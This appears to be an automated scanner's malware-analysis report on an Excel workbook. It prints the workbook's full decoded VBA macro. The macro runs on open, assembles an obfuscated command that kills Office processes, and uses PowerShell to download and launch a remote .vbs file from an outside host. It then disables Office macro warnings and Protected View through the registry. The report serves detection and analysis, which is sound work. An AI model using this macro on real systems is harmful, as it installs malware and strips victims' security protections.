MALICIOUS
290
Risk Score
Heuristics 7
-
ClamAV: Doc.Macro.Obfuscation-6391394-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6391394-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set XmAnwXauj = CreateObject("WScript.Shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set XmAnwXauj = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://fast-cargo.com/images/file/vb/7.vbs In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13499 bytes |
SHA-256: 47e0bb0da1095944ff94ee737f84931441d15aaf2e125ce6658fe428ca4759a8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub asdasdasd()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Set XmAnwXauj = CreateObject("WScript.Shell")
Dim SowSXAzw
Dim IWonWUQjx
Dim IWnWUQj
Dim ASDnqiAxW
Dim AnxWnUN
Dim WJnzWUA
Dim ADmWnau
Dim JnWNzX
Dim MAUw2Cha
Dim MAas2Cha
Dim Wn3asni
SowSXAzw = "c"
SowSXAzw = SowSXAzw & "m"
SowSXAzw = SowSXAzw & "d"
SowSXAzw = SowSXAzw & "."
SowSXAzw = SowSXAzw & "e"
SowSXAzw = SowSXAzw & "x"
SowSXAzw = SowSXAzw & "e "
SowSXAzw = SowSXAzw & "/"
SowSXAzw = SowSXAzw & "K "
SowSXAzw = SowSXAzw & "t"
SowSXAzw = SowSXAzw & "a"
SowSXAzw = SowSXAzw & "s"
SowSXAzw = SowSXAzw & "k"
SowSXAzw = SowSXAzw & "k"
SowSXAzw = SowSXAzw & "i"
SowSXAzw = SowSXAzw & "l"
SowSXAzw = SowSXAzw & "l "
SowSXAzw = SowSXAzw & "/"
SowSXAzw = SowSXAzw & "f "
SowSXAzw = SowSXAzw & "/"
SowSXAzw = SowSXAzw & "i"
SowSXAzw = SowSXAzw & "m "
SowSXAzw = SowSXAzw & "w"
SowSXAzw = SowSXAzw & "i"
SowSXAzw = SowSXAzw & "n"
IWonWUQjx = "w"
IWonWUQjx = IWonWUQjx & "o"
IWonWUQjx = IWonWUQjx & "r"
IWonWUQjx = IWonWUQjx & "ds"
IWonWUQjx = IWonWUQjx & "."
IWonWUQjx = IWonWUQjx & "e"
IWonWUQjx = IWonWUQjx & "x"
IWonWUQjx = IWonWUQjx & "e"
IWonWUQjx = IWonWUQjx & "&"
IWonWUQjx = IWonWUQjx & "t"
IWonWUQjx = IWonWUQjx & "a"
IWonWUQjx = IWonWUQjx & "s"
IWonWUQjx = IWonWUQjx & "k"
IWonWUQjx = IWonWUQjx & "k"
IWonWUQjx = IWonWUQjx & "i"
IWonWUQjx = IWonWUQjx & "l"
IWonWUQjx = IWonWUQjx & "l "
IWonWUQjx = IWonWUQjx & "/"
IWonWUQjx = IWonWUQjx & "f "
IWonWUQjx = IWonWUQjx & "/"
IWonWUQjx = IWonWUQjx & "i"
IWonWUQjx = IWonWUQjx & "m "
IWonWUQjx = IWonWUQjx & "E"
IWonWUQjx = IWonWUQjx & "x"
IWonWUQjx = IWonWUQjx & "c"
IWnWUQj = "e"
IWnWUQj = IWnWUQj & "ls"
IWnWUQj = IWnWUQj & "."
IWnWUQj = IWnWUQj & "e"
IWnWUQj = IWnWUQj & "x"
IWnWUQj = IWnWUQj & "e"
ASDnqiAxW = "&"
ASDnqiAxW = ASDnqiAxW & "P"
ASDnqiAxW = ASDnqiAxW & "o"
ASDnqiAxW = ASDnqiAxW & "w"
ASDnqiAxW = ASDnqiAxW & "e"
ASDnqiAxW = ASDnqiAxW & "r"
ASDnqiAxW = ASDnqiAxW & "S"
ASDnqiAxW = ASDnqiAxW & "h"
ASDnqiAxW = ASDnqiAxW & "e"
AnxWnUN = "l"
AnxWnUN = AnxWnUN & "l "
AnxWnUN = AnxWnUN & "("
AnxWnUN = AnxWnUN & "N"
AnxWnUN = AnxWnUN & "e"
AnxWnUN = AnxWnUN & "w"
AnxWnUN = AnxWnUN & "-"
AnxWnUN = AnxWnUN & "O"
AnxWnUN = AnxWnUN & "b"
AnxWnUN = AnxWnUN & "j"
AnxWnUN = AnxWnUN & "e"
AnxWnUN = AnxWnUN & "c"
AnxWnUN = AnxWnUN & "t "
AnxWnUN = AnxWnUN & "S"
AnxWnUN = AnxWnUN & "y"
AnxWnUN = AnxWnUN & "s"
AnxWnUN = AnxWnUN & "t"
AnxWnUN = AnxWnUN & "e"
WJnzWUA = "m"
WJnzWUA = WJnzWUA & "."
WJnzWUA = WJnzWUA & "N"
WJnzWUA = WJnzWUA & "e"
WJnzWUA = WJnzWUA & "t"
WJnzWUA = WJnzWUA & "."
WJnzWUA = WJnzWUA & "W"
WJnzWUA = WJnzWUA & "e"
WJnzWUA = WJnzWUA & "b"
WJnzWUA = WJnzWUA & "C"
WJnzWUA = WJnzWUA & "l"
WJnzWUA = WJnzWUA & "i"
WJnzWUA = WJnzWUA & "e"
WJnzWUA = WJnzWUA & "n"
WJnzWUA = WJnzWUA & "t"
WJnzWUA = WJnzWUA & ")"
WJnzWUA = WJnzWUA & "."
ADmWnau = "D"
ADmWnau = ADmWnau & "o"
ADmWnau = ADmWnau & "w"
ADmWnau = ADmWnau & "n"
ADmWnau = ADmWnau & "l"
ADmWnau = ADmWnau & "o"
ADmWnau = ADmWnau & "a"
ADmWnau = ADmWnau & "d"
ADmWnau = ADmWnau & "F"
ADmWnau = ADmWnau & "i"
ADmWnau = ADmWnau & "l"
ADmWnau = ADmWnau & "e"
ADmWnau = ADmWnau & "("
ADmWnau = ADmWnau & "'http://fast-cargo.com/images/file/vb/7.vbs'"
JnWNzX = ","
JnWNzX = JnWNzX & "'"
JnWNzX = JnWNzX & "%"
JnWNzX = JnWNzX & "a"
JnWNzX = JnWNzX & "p"
JnWNzX = JnWNzX & "p"
JnWNzX = JnWNzX & "d"
JnWNzX = JnWNzX & "a"
JnWNzX = JnWNzX & "t"
JnWNzX = JnWNzX & "a"
JnWNzX = JnWNzX & "%"
JnWNzX = JnWNzX & "\"
JnWNzX = JnWNzX & "I"
MAUw2Cha = "n"
MAUw2Cha = MAUw2Cha & "t"
MAUw2Cha = MAUw2Cha & "e"
MAUw2Cha = MAUw2Cha & "r"
MAUw2Cha = MAUw2Cha & "n"
MAUw2Cha = MAUw2Cha & "t"
MAUw2Cha = MAUw2Cha & "e"
MAUw2Cha = MAUw2Cha & "."
MAUw2Cha = MAUw2Cha & "v"
MAUw2Cha = MAUw2Cha & "b"
MAUw2Cha = MAUw2Cha & "s"
MAUw2Cha = MAUw2Cha & "'"
MAUw2Cha = MAUw2Cha & ")"
MAUw2Cha = MAUw2Cha & ";"
MAUw2Cha = MAUw2Cha & "S"
MAUw2Cha = MAUw2Cha & "t"
MAUw2Cha = MAUw2Cha & "a"
MAUw2Cha = MAUw2Cha & "r"
MAUw2Cha = MAUw2Cha & "t"
MAUw2Cha = MAUw2Cha & "-"
MAas2Cha = "P"
MAas2Cha = MAas2Cha & "r"
MAas2Cha = MAas2Cha & "o"
MAas2Cha = MAas2Cha & "c"
MAas2Cha = MAas2Cha & "e"
MAas2Cha = MAas2Cha & "s"
MAas2Cha = MAas2Cha & "s "
MAas2Cha = MAas2Cha & "'"
MAas2Cha = MAas2Cha & "%"
MAas2Cha = MAas2Cha & "a"
MAas2Cha = MAas2Cha & "p"
MAas2Cha = MAas2Cha & "p"
MAas2Cha = MAas2Cha & "d"
MAas2Cha = MAas2Cha & "a"
MAas2Cha = MAas2Cha & "t"
MAas2Cha = MAas2Cha & "a"
Wn3asni = "%"
Wn3asni = Wn3asni & "\"
Wn3asni = Wn3asni & "I"
Wn3asni = Wn3asni & "n"
Wn3asni = Wn3asni & "t"
Wn3asni = Wn3asni & "e"
Wn3asni = Wn3asni & "r"
Wn3asni = Wn3asni & "n"
Wn3asni = Wn3asni & "t"
Wn3asni = Wn3asni & "e"
Wn3asni = Wn3asni & "."
Wn3asni = Wn3asni & "v"
Wn3asni = Wn3asni & "b"
Wn3asni = Wn3asni & "s"
Wn3asni = Wn3asni & "'"
SowSXAzw2 = SowSXAzw + IWonWUQjx + IWnWUQj + ASDnqiAxW + AnxWnUN + WJnzWUA + ADmWnau + JnWNzX + MAUw2Cha + MAas2Cha + Wn3asni
XmAnwXauj.Run SowSXAzw2, vbHide
Set wso = CreateObject("WScript.Shell")
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 48640 bytes |
SHA-256: 780feea007da3040fe70336be1a528cbd9b91e63bc16fc64d0c00e77ed374ac0 |
|||
|
Detection
ClamAV:
Doc.Macro.Obfuscation-6391394-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.